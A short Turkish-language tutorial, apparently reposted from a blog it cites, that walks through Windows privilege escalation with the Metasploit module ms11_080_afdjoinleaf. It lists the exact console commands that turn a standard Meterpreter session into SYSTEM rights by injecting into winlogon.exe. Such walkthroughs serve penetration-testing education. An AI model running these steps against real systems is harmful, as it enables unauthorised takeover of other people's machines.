Standart yetkilerle elde edilen Meterpreter bağlantısında aşağıdaki gibi görülmektedir.
sessions
Standart yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms11_080_afdjoinleaf istismar modülü seçilir.
search ms11_080_afdjoinleaf
use exploit/windows/local/ms11_080_afdjoinleaf
show options
Modüle, mevcut oturuma ait ID değeri verilerek modül çalıştırılır ve SYSTEM hakları elde edilir.
set SESSION 1
run
getuid
getpid
ps
Modülün SYSTEM hakları ile çalışan “winlogon.exe” bir prosese enjekte olduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel yönetici (hatta SYSTEM) haklarının elde edilebildiği görülmektedir.
Kaynak:
https://xtkme.wordpress.com/tag/ms11-080/